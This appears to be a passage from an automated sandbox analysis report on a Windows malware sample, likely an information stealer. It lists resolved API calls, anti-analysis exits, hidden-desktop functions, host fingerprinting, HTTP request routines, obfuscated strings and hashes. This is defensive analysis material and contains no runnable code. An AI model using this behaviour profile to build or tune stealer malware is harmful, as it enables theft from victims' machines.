28386->28363 28386->28365 28386->28368 
28386->28369 28386->28370 28386->28371 28386->28380 28386->28383 28386->28391 28387 8ffbab lstrcpy 28387->28391 28388 8e1530 8 API calls 28388->28391 28389 8ffec9 lstrcpy 28389->28391 28390 8ff070 28 API calls 28390->28391 28391->28333 28391->28334 28391->28336 28391->28338 28391->28342 28391->28372 28391->28375 28391->28381 28391->28382 28391->28384 28391->28385 28391->28386 28391->28387 28391->28388 28391->28389 28391->28390 28392 8ffbf9 lstrcpy 28391->28392 28393 8fff1a lstrcpy 28391->28393 28392->28391 28393->28391 28394->27418 28396 902955 28395->28396 28397 90295c GetVolumeInformationA 28395->28397 28396->28397 28398 9029bc GetProcessHeap RtlAllocateHeap 28397->28398 28400 9029f2 28398->28400 28401 9029f6 wsprintfA 28398->28401 28618 9073f0 28400->28618 28401->28400 28405 8e4c70 28404->28405 28406 8e4c85 28405->28406 28407 8e4c7d lstrcpy 28405->28407 28622 8e4bc0 28406->28622 28407->28406 28409 8e4c90 28410 8e4ccc lstrcpy 28409->28410 28411 8e4cd8 28409->28411 28410->28411 28412 8e4cff lstrcpy 28411->28412 28413 8e4d0b 28411->28413 28412->28413 28414 8e4d2f lstrcpy 28413->28414 28415 8e4d3b 28413->28415 28414->28415 28416 8e4d6d lstrcpy 28415->28416 28417 8e4d79 28415->28417 28416->28417 28418 8e4dac InternetOpenA StrCmpCA 28417->28418 28419 8e4da0 lstrcpy 28417->28419 28420 8e4de0 28418->28420 28419->28418 28421 8e54b8 InternetCloseHandle CryptStringToBinaryA 28420->28421 28626 904040 28420->28626 28423 8e54e8 LocalAlloc 28421->28423 28438 8e55d8 28421->28438 28424 8e54ff CryptStringToBinaryA 28423->28424 28423->28438 28425 8e5529 lstrlen 28424->28425 28426 8e5517 LocalFree 28424->28426 28427 8e553d 28425->28427 28426->28438 28429 8e5557 lstrcpy 28427->28429 28430 8e5563 lstrlen 28427->28430 28428 8e4dfa 28431 8e4e23 lstrcpy lstrcat 28428->28431 28432 8e4e38 28428->28432 28429->28430 28434 8e557d 28430->28434 28431->28432 28433 8e4e5a lstrcpy 28432->28433 28435 8e4e62 28432->28435 28433->28435 28436 8e558f lstrcpy lstrcat 28434->28436 28437 8e55a2 

                            Control-flow Graph (graph image not preserved in text export)
                            APIs
                            • GetProcAddress.KERNEL32(76210000,012E66F8), ref: 00906905
                            • GetProcAddress.KERNEL32(76210000,012E66D8), ref: 0090691D
                            • GetProcAddress.KERNEL32(76210000,012F97B8), ref: 00906936
                            • GetProcAddress.KERNEL32(76210000,012F9818), ref: 0090694E
                            • GetProcAddress.KERNEL32(76210000,012F9830), ref: 00906966
                            • GetProcAddress.KERNEL32(76210000,012FD938), ref: 0090697F
                            • GetProcAddress.KERNEL32(76210000,012EA8E0), ref: 00906997
                            • GetProcAddress.KERNEL32(76210000,012FDA58), ref: 009069AF
                            • GetProcAddress.KERNEL32(76210000,012FDAB8), ref: 009069C8
                            • GetProcAddress.KERNEL32(76210000,012FDB18), ref: 009069E0
                            • GetProcAddress.KERNEL32(76210000,012FD980), ref: 009069F8
                            • GetProcAddress.KERNEL32(76210000,012E6718), ref: 00906A11
                            • GetProcAddress.KERNEL32(76210000,012E6738), ref: 00906A29
                            • GetProcAddress.KERNEL32(76210000,012E6758), ref: 00906A41
                            • GetProcAddress.KERNEL32(76210000,012E6778), ref: 00906A5A
                            • GetProcAddress.KERNEL32(76210000,012FD8C0), ref: 00906A72
                            • GetProcAddress.KERNEL32(76210000,012FD8F0), ref: 00906A8A
                            • GetProcAddress.KERNEL32(76210000,012EA598), ref: 00906AA3
                            • GetProcAddress.KERNEL32(76210000,012E65B8), ref: 00906ABB
                            • GetProcAddress.KERNEL32(76210000,012FD890), ref: 00906AD3
                            • GetProcAddress.KERNEL32(76210000,012FDAE8), ref: 00906AEC
                            • GetProcAddress.KERNEL32(76210000,012FD998), ref: 00906B04
                            • GetProcAddress.KERNEL32(76210000,012FDAA0), ref: 00906B1C
                            • GetProcAddress.KERNEL32(76210000,012E6798), ref: 00906B35
                            • GetProcAddress.KERNEL32(76210000,012FD9E0), ref: 00906B4D
                            • GetProcAddress.KERNEL32(76210000,012FDB30), ref: 00906B65
                            • GetProcAddress.KERNEL32(76210000,012FDB48), ref: 00906B7E
                            • GetProcAddress.KERNEL32(76210000,012FDA70), ref: 00906B96
                            • GetProcAddress.KERNEL32(76210000,012FD9B0), ref: 00906BAE
                            • GetProcAddress.KERNEL32(76210000,012FDB60), ref: 00906BC7
                            • GetProcAddress.KERNEL32(76210000,012FD878), ref: 00906BDF
                            • GetProcAddress.KERNEL32(76210000,012FDA88), ref: 00906BF7
                            • GetProcAddress.KERNEL32(76210000,012FD8A8), ref: 00906C10
                            • GetProcAddress.KERNEL32(76210000,012EF8F8), ref: 00906C28
                            • GetProcAddress.KERNEL32(76210000,012FDA10), ref: 00906C40
                            • GetProcAddress.KERNEL32(76210000,012FD8D8), ref: 00906C59
                            • GetProcAddress.KERNEL32(76210000,012E65D8), ref: 00906C71
                            • GetProcAddress.KERNEL32(76210000,012FDAD0), ref: 00906C89
                            • GetProcAddress.KERNEL32(76210000,012E67B8), ref: 00906CA2
                            • GetProcAddress.KERNEL32(76210000,012FD908), ref: 00906CBA
                            • GetProcAddress.KERNEL32(76210000,012FD920), ref: 00906CD2
                            • GetProcAddress.KERNEL32(76210000,012E67D8), ref: 00906CEB
                            • GetProcAddress.KERNEL32(76210000,012E6878), ref: 00906D03
                            • LoadLibraryA.KERNEL32(012FD950,009006EF), ref: 00906D15
                            • LoadLibraryA.KERNEL32(012FD9C8), ref: 00906D26
                            • LoadLibraryA.KERNEL32(012FD9F8), ref: 00906D38
                            • LoadLibraryA.KERNEL32(012FDA28), ref: 00906D4A
                            • LoadLibraryA.KERNEL32(012FD968), ref: 00906D5B
                            • LoadLibraryA.KERNEL32(012FDA40), ref: 00906D6D
                            • LoadLibraryA.KERNEL32(012FDB00), ref: 00906D7F
                            • LoadLibraryA.KERNEL32(012FDDD0), ref: 00906D90
                            • GetProcAddress.KERNEL32(751E0000,012E62F8), ref: 00906DAC
                            • GetProcAddress.KERNEL32(751E0000,012FDC20), ref: 00906DC4
                            • GetProcAddress.KERNEL32(751E0000,012F9220), ref: 00906DDD
                            • GetProcAddress.KERNEL32(751E0000,012FDB90), ref: 00906DF5
                            • GetProcAddress.KERNEL32(751E0000,012E6498), ref: 00906E0D
                            • GetProcAddress.KERNEL32(701C0000,012EA638), ref: 00906E2D
                            • GetProcAddress.KERNEL32(701C0000,012E64B8), ref: 00906E45
                            • GetProcAddress.KERNEL32(701C0000,012EA6D8), ref: 00906E5E
                            • GetProcAddress.KERNEL32(701C0000,012FDD70), ref: 00906E76
                            • GetProcAddress.KERNEL32(701C0000,012FDCB0), ref: 00906E8E
                            • GetProcAddress.KERNEL32(701C0000,012E6138), ref: 00906EA7
                            • GetProcAddress.KERNEL32(701C0000,012E6258), ref: 00906EBF
                            • GetProcAddress.KERNEL32(701C0000,012FDC38), ref: 00906ED7
                            • GetProcAddress.KERNEL32(753A0000,012E6158), ref: 00906EF3
                            • GetProcAddress.KERNEL32(753A0000,012E6438), ref: 00906F0B
                            • GetProcAddress.KERNEL32(753A0000,012FDB78), ref: 00906F24
                            • GetProcAddress.KERNEL32(753A0000,012FDC68), ref: 00906F3C
                            • GetProcAddress.KERNEL32(753A0000,012E60F8), ref: 00906F54
                            • GetProcAddress.KERNEL32(76310000,012EA700), ref: 00906F74
                            • GetProcAddress.KERNEL32(76310000,012EA728), ref: 00906F8C
                            • GetProcAddress.KERNEL32(76310000,012FDE30), ref: 00906FA5
                            • GetProcAddress.KERNEL32(76310000,012E6178), ref: 00906FBD
                            • GetProcAddress.KERNEL32(76310000,012E6238), ref: 00906FD5
                            • GetProcAddress.KERNEL32(76310000,012EA778), ref: 00906FEE
                            • GetProcAddress.KERNEL32(76910000,012FDD10), ref: 0090700E
                            • GetProcAddress.KERNEL32(76910000,012E6478), ref: 00907026
                            • GetProcAddress.KERNEL32(76910000,012F9250), ref: 0090703F
                            • GetProcAddress.KERNEL32(76910000,012FDDB8), ref: 00907057
                            • GetProcAddress.KERNEL32(76910000,012FDE48), ref: 0090706F
                            • GetProcAddress.KERNEL32(76910000,012E60D8), ref: 00907088
                            • GetProcAddress.KERNEL32(76910000,012E6198), ref: 009070A0
                            • GetProcAddress.KERNEL32(76910000,012FDC50), ref: 009070B8
                            • GetProcAddress.KERNEL32(76910000,012FDE18), ref: 009070D1
                            • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 009070E7
                            • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 009070FE
                            • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 00907115
                            • GetProcAddress.KERNEL32(75B30000,012E6298), ref: 00907131
                            • GetProcAddress.KERNEL32(75B30000,012FDD40), ref: 00907149
                            • GetProcAddress.KERNEL32(75B30000,012FDBC0), ref: 00907162
                            • GetProcAddress.KERNEL32(75B30000,012FDC80), ref: 0090717A
                            • GetProcAddress.KERNEL32(75B30000,012FDC08), ref: 00907192
                            • GetProcAddress.KERNEL32(75670000,012E61B8), ref: 009071AE
                            • GetProcAddress.KERNEL32(75670000,012E6118), ref: 009071C6
                            • GetProcAddress.KERNEL32(76AC0000,012E61D8), ref: 009071E2
                            • GetProcAddress.KERNEL32(76AC0000,012FDE60), ref: 009071FA
                            • GetProcAddress.KERNEL32(6F4E0000,012E61F8), ref: 0090721A
                            • GetProcAddress.KERNEL32(6F4E0000,012E62B8), ref: 00907232
                            • GetProcAddress.KERNEL32(6F4E0000,012E6218), ref: 0090724B
                            • GetProcAddress.KERNEL32(6F4E0000,012FDC98), ref: 00907263
                            • GetProcAddress.KERNEL32(6F4E0000,012E6278), ref: 0090727B
                            • GetProcAddress.KERNEL32(6F4E0000,012E62D8), ref: 00907294
                            • GetProcAddress.KERNEL32(6F4E0000,012E6358), ref: 009072AC
                            • GetProcAddress.KERNEL32(6F4E0000,012E6318), ref: 009072C4
                            • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 009072DB
                            • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 009072F2
                            • GetProcAddress.KERNEL32(75AE0000,012FDD58), ref: 0090730E
                            • GetProcAddress.KERNEL32(75AE0000,012F90F0), ref: 00907326
                            • GetProcAddress.KERNEL32(75AE0000,012FDDE8), ref: 0090733F
                            • GetProcAddress.KERNEL32(75AE0000,012FDBA8), ref: 00907357
                            • GetProcAddress.KERNEL32(76300000,012E6338), ref: 00907373
                            • GetProcAddress.KERNEL32(6E970000,012FDBD8), ref: 0090738F
                            • GetProcAddress.KERNEL32(6E970000,012E6378), ref: 009073A7
                            • GetProcAddress.KERNEL32(6E970000,012FDE00), ref: 009073C0
                            • GetProcAddress.KERNEL32(6E970000,012FDCC8), ref: 009073D8
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                            • API String ID: 2238633743-3468015613
                            • Opcode ID: b008fb01ce8bde873b3169ef7b423d644a6170262e378f988e609b5fef1dc5fd
                            • Instruction ID: 9ac01a6f8de402ddade8e8746a7cd23083985ed1e36e59c41ed503ef868d98ca
                            • Opcode Fuzzy Hash: b008fb01ce8bde873b3169ef7b423d644a6170262e378f988e609b5fef1dc5fd
                            • Instruction Fuzzy Hash: 53623DB5A10280EFD754DF64ECACAE637BAF78C641390C929E956C3364DF34A841DB60
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E4C7F
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E4CD2
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E4D05
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E4D35
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E4D73
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E4DA6
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008E4DB6
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 6d948dd06f9efcb0baaef8b4e53d4427ca0b2381357c5f40c0a537ac15f416e1
                            • Instruction ID: fb7d6c599de237f30be1c6cb3ab2b53dac43a34a47556d33e9a843792cdd1468
                            • Opcode Fuzzy Hash: 6d948dd06f9efcb0baaef8b4e53d4427ca0b2381357c5f40c0a537ac15f416e1
                            • Instruction Fuzzy Hash: 9C529C72900296AFCB21AFB9DC49BAEBBB9FF45314F145024F805E7251DB70ED428B91

                            Control-flow Graph (graph image not preserved in text export)
                            APIs
                            • GetProcAddress.KERNEL32(76210000,012F1728), ref: 009065F9
                            • GetProcAddress.KERNEL32(76210000,012F1608), ref: 00906612
                            • GetProcAddress.KERNEL32(76210000,012F1590), ref: 0090662A
                            • GetProcAddress.KERNEL32(76210000,012F1710), ref: 00906642
                            • GetProcAddress.KERNEL32(76210000,012F90B0), ref: 0090665B
                            • GetProcAddress.KERNEL32(76210000,012E64D8), ref: 00906673
                            • GetProcAddress.KERNEL32(76210000,012E6558), ref: 0090668B
                            • GetProcAddress.KERNEL32(76210000,012F16B0), ref: 009066A4
                            • GetProcAddress.KERNEL32(76210000,012F1650), ref: 009066BC
                            • GetProcAddress.KERNEL32(76210000,012F1548), ref: 009066D4
                            • GetProcAddress.KERNEL32(76210000,012F1740), ref: 009066ED
                            • GetProcAddress.KERNEL32(76210000,012E6638), ref: 00906705
                            • GetProcAddress.KERNEL32(76210000,012F1560), ref: 0090671D
                            • GetProcAddress.KERNEL32(76210000,012F16C8), ref: 00906736
                            • GetProcAddress.KERNEL32(76210000,012E6698), ref: 0090674E
                            • GetProcAddress.KERNEL32(76210000,012F1770), ref: 00906766
                            • GetProcAddress.KERNEL32(76210000,012F1788), ref: 0090677F
                            • GetProcAddress.KERNEL32(76210000,012E6838), ref: 00906797
                            • GetProcAddress.KERNEL32(76210000,012F1878), ref: 009067AF
                            • GetProcAddress.KERNEL32(76210000,012E64F8), ref: 009067C8
                            • LoadLibraryA.KERNEL32(012F1818,?,?,?,00901DD3), ref: 009067D9
                            • LoadLibraryA.KERNEL32(012F1848,?,?,?,00901DD3), ref: 009067EB
                            • LoadLibraryA.KERNEL32(012F1830,?,?,?,00901DD3), ref: 009067FD
                            • LoadLibraryA.KERNEL32(012F1860,?,?,?,00901DD3), ref: 0090680E
                            • LoadLibraryA.KERNEL32(012F17E8,?,?,?,00901DD3), ref: 00906820
                            • GetProcAddress.KERNEL32(75B30000,012F1890), ref: 0090683D
                            • GetProcAddress.KERNEL32(751E0000,012F1800), ref: 00906859
                            • GetProcAddress.KERNEL32(751E0000,012F18A8), ref: 00906871
                            • GetProcAddress.KERNEL32(76910000,012F9728), ref: 0090688D
                            • GetProcAddress.KERNEL32(75670000,012E67F8), ref: 009068A9
                            • GetProcAddress.KERNEL32(77310000,012F91A0), ref: 009068C5
                            • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 009068DC
                            Strings
                            • NtQueryInformationProcess, xrefs: 009068D1
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: 502f633ea6f90c33eec4dbc962f1d794177604d5781fc7c30389e1525f9911f8
                            • Instruction ID: 3f91a722bc0abc19a7e82d59e2ff2186bcb9d72d3a13f36b31f23390718e3b73
                            • Opcode Fuzzy Hash: 502f633ea6f90c33eec4dbc962f1d794177604d5781fc7c30389e1525f9911f8
                            • Instruction Fuzzy Hash: 6FA14EB5A11280EFD754DF64ECACAA637B9F78C641380C929E916C3364DF34A901DF60

                            Control-flow Graph (graph image not preserved in text export)
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: :7<!x#%#$0CPAFHU8B2I0TBE0QZ18$1PAA2HJUEHALF$2D9XJ6M6$2JGV2Z9M9HQ4$4RGJ5NO4L$5BYHYEUK$7WZ1RIA9DDAAJ6$8A[6^#$8EXMUG92ROKG$95PKY$9JMCW9XCBDGEZU6YCVRN$9RFHO2G1$AT38YGATL2$C3YXFWQ7050E$CJYY5GIZUPTTZO$E3QE08QC8II8$ELQKM9K5O5Q$HTNR912K0PEF$INQLMGW4YZXC8RFTL$K28W0E$K5U7CGV5ONS$KKWWRXQ7KU2Y$KT3M1IM293$L0S2JTDCK$MSHN6QKQEMU$N2INC4PY7KDGDMSKU7I3$NNSPMVGIO$NR7FVO5$O46TOKO7UJ1$R9R37GL6PWFTV$REP8MZKJOIEOI$RN3BIQNGMZ10L1KLZK$STVZ79L0Z$TLJMUC$U!2:,B>p$VA7FTZGOASO5C37$VJ1ZSUA1VCWE448X$W0SD8LNKF$XOFQRZLRSI5C00OYT5OS$XP982EDIEXR$Y1-::$!$Z574GK0$^7M*&S#w$jY5.)$p2.a &"x 3$9E
                            • API String ID: 1542196881-3058762087
                            • Opcode ID: 02428c790af0e3cf48282c432d519536015ea7bfd6fa7208ecc8e482a8c0b9db
                            • Instruction ID: 4faa571310a00647cec36b3f2305f3e8c4a9786a31075286a355dbf59f8d4008
                            • Opcode Fuzzy Hash: 02428c790af0e3cf48282c432d519536015ea7bfd6fa7208ecc8e482a8c0b9db
                            • Instruction Fuzzy Hash: CE7134B8BC938CB6D610EB626C07FC53550BBD1B59F409466B326BB2D2EEF051C08A49

                            Control-flow Graph: function starting at 00901DC0 (graph rendering omitted; the called APIs are listed below)
                            APIs
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1728), ref: 009065F9
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1608), ref: 00906612
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1590), ref: 0090662A
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1710), ref: 00906642
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F90B0), ref: 0090665B
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012E64D8), ref: 00906673
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012E6558), ref: 0090668B
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F16B0), ref: 009066A4
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1650), ref: 009066BC
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1548), ref: 009066D4
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1740), ref: 009066ED
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012E6638), ref: 00906705
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1560), ref: 0090671D
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00901DFF
                            • ExitProcess.KERNEL32 ref: 00901E37
                            • GetSystemInfo.KERNEL32(?), ref: 00901E41
                            • ExitProcess.KERNEL32 ref: 00901E4F
                              • Part of subcall function 008E1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008E1046
                              • Part of subcall function 008E1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 008E104D
                              • Part of subcall function 008E1030: ExitProcess.KERNEL32 ref: 008E1058
                              • Part of subcall function 008E10C0: GlobalMemoryStatusEx.KERNEL32 ref: 008E10EA
                              • Part of subcall function 008E10C0: ExitProcess.KERNEL32 ref: 008E1114
                            • GetUserDefaultLangID.KERNEL32 ref: 00901E5F
                            • ExitProcess.KERNEL32 ref: 00901E82
                            • ExitProcess.KERNEL32 ref: 00901EB1
                            • lstrlen.KERNEL32(012F92A0), ref: 00901EBE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00901EE5
                            • lstrcat.KERNEL32(00000000,012F92A0), ref: 00901EED
                            • lstrlen.KERNEL32(00914BA0), ref: 00901EF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901F18
                            • lstrcat.KERNEL32(00000000,00914BA0), ref: 00901F24
                            • lstrlen.KERNEL32(00000000), ref: 00901F33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901F59
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00901F64
                            • lstrlen.KERNEL32(00914BA0), ref: 00901F6F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901F8C
                            • lstrcat.KERNEL32(00000000,00914BA0), ref: 00901F98
                            • lstrlen.KERNEL32(00000000), ref: 00901FA7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901FC9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00901FD4
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                            • String ID:
                            • API String ID: 3366406952-0
                            • Opcode ID: 59c03cb10c5d04285cd71503fc49edadd1797615c45d8fad98b77a5985cc122b
                            • Instruction ID: a78c2b6b062d7359ea6a99abe61d49bfc08ad83905ad86db227e10dbb62e9de1
                            • Opcode Fuzzy Hash: 59c03cb10c5d04285cd71503fc49edadd1797615c45d8fad98b77a5985cc122b
                            • Instruction Fuzzy Hash: F2717C31900256AFDB21ABB5DC9DBAE3ABEFF45701F448024F906E7191DF709902CB61

                            Control-flow Graph: function starting at 008E6C40 (graph rendering omitted; the called APIs are listed below)
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E6C6F
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E6CC2
                            • InternetOpenA.WININET(0090CFF4,00000001,00000000,00000000,00000000), ref: 008E6CD5
                            • StrCmpCA.SHLWAPI(?,012FFAC8), ref: 008E6CED
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E6D15
                            • HttpOpenRequestA.WININET(00000000,GET,?,012FF1C8,00000000,00000000,-00400100,00000000), ref: 008E6D50
                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E6D77
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008E6D86
                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 008E6DA5
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008E6DFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E6E5B
                            • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 008E6E7D
                            • InternetCloseHandle.WININET(00000000), ref: 008E6E8E
                            • InternetCloseHandle.WININET(?), ref: 008E6E98
                            • InternetCloseHandle.WININET(00000000), ref: 008E6EA2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E6EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                            • String ID: ERROR$GET
                            • API String ID: 3687753495-3591763792
                            • Opcode ID: 804af9a903e92aceb5a6250c26a9bb77fb245ad813d1ae33db8f0c7b2589d02a
                            • Instruction ID: 75510acaf86b08db1b82d89e0c04e699799e5706e7d391df9da26fa7b480f196
                            • Opcode Fuzzy Hash: 804af9a903e92aceb5a6250c26a9bb77fb245ad813d1ae33db8f0c7b2589d02a
                            • Instruction Fuzzy Hash: 0381BE72A40256ABEB20DFA5DC49FEE77B8FF45750F144128F905E7280EB70AE418B91

                            Control-flow Graph: function starting at 00902910 (graph rendering omitted; the called APIs are listed below)
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0090294B
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,008F9506,00000000,00000000,00000000,00000000), ref: 0090297C
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009029DF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 009029E6
                            • wsprintfA.USER32 ref: 00902A0B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                            • String ID: :\$C
                            • API String ID: 2572753744-3309953409
                            • Opcode ID: fc2d04e61c495fbdf9606ab5b348893574da5c52be6360b108d641f2a1078c51
                            • Instruction ID: a74fc0080a88b2912a50ede60c730da6d7f9198ac405b53b2c456527af81ea89
                            • Opcode Fuzzy Hash: fc2d04e61c495fbdf9606ab5b348893574da5c52be6360b108d641f2a1078c51
                            • Instruction Fuzzy Hash: D731A6B1D042499FCB14DFB89A89AEFFFBCFF58710F10416AE515E7250E6348A408BA1

                            Control-flow Graph: function starting at 008E4A60 (graph rendering omitted; the called APIs are listed below)
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008E4AA2
                            • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 008E4BB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-3329630956
                            • Opcode ID: 4dfa635067f1b867f561448f5c8d27fcc5a671b83b6186a857e7a50aabc1d9d6
                            • Instruction ID: 0cee0204e48564d14028616bd5650e0ee2054212d605a43e48b65b62912c1f3d
                            • Opcode Fuzzy Hash: 4dfa635067f1b867f561448f5c8d27fcc5a671b83b6186a857e7a50aabc1d9d6
                            • Instruction Fuzzy Hash: 7A31E0A1F80A6C76A6306BF66C4AFFF7E5DDFCDF68B004256F4085618189A055C1CAE2
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00902C3F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00902C46
                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00902C5A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 8a46a3fecec86b16cf83a420dfb5d9facad5338517d9aad85e75152f7c73619e
                            • Instruction ID: c15433af4f9ec2cfb761e9ad55d248661b06f5127d43e5c0279f90bbe9f560fe
                            • Opcode Fuzzy Hash: 8a46a3fecec86b16cf83a420dfb5d9facad5338517d9aad85e75152f7c73619e
                            • Instruction Fuzzy Hash: 78F0B4B1A40244AFC700DF88DD49F9ABBBCF748B21F100226F914E3280D774190486E1
                            APIs
                            • lstrlen.KERNEL32(0090CFF4), ref: 008FF3B5
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FF3D1
                            • lstrlen.KERNEL32(0090CFF4), ref: 008FF3DC
